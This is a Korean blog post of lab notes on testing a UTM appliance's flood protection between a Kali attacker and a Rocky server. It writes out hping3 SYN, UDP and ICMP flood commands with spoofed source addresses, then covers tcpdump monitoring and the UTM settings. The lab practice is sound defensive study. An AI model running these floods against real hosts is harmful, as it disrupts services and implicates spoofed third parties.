KAIL(공격) ↔ UTM ↔ Rocky Server
[UTM]
네트워크 보호 - 침입 방지
- TCP SYN Flooding
- UDP Flooding
- ICMP Flooding
[WEB Flooding=TCP SYN 플러딩 ]
hping3 -a 100.100.100.100 192.168.20.150 -S -p 80 --flood
-S : SYN
-p : port
-a : 출발지 주소
[UDP Flooding]
hping3 -a 100.100.100.100 192.168.20.150 -d 65000 -p 53 --flood
[ICMP Flooding]
hping3 -1 --flood 192.168.20.150
hping3 -1 -S -a 8.8.8.8 --flood 192.168.20.150
[실시간 추적]
tcpdump -i ens160 port 80 -A
인터페이스 및 라우팅 - 인터페이스 확인
네트워크 서비스 - 방화벽 / 침입 방지
침입 방지 - ICMP 플러드 방지
로깅 및 보고 - 로그 파일 보기 - 라이브 로그
Linux Terminal
# gnome-system-monitor
-> 자원 클릭 -> 네트워크 및 CPU 사용량 확인
'IT 엔지니어 > Linux server' 카테고리의 다른 글
| TOMCAT (0) | 2025.04.23 |
|---|---|
| Web Security (0) | 2025.04.23 |
| Security Protection (0) | 2025.04.22 |
| Snort (0) | 2025.04.21 |
| 리눅스 own클라우드 (0) | 2025.03.31 |
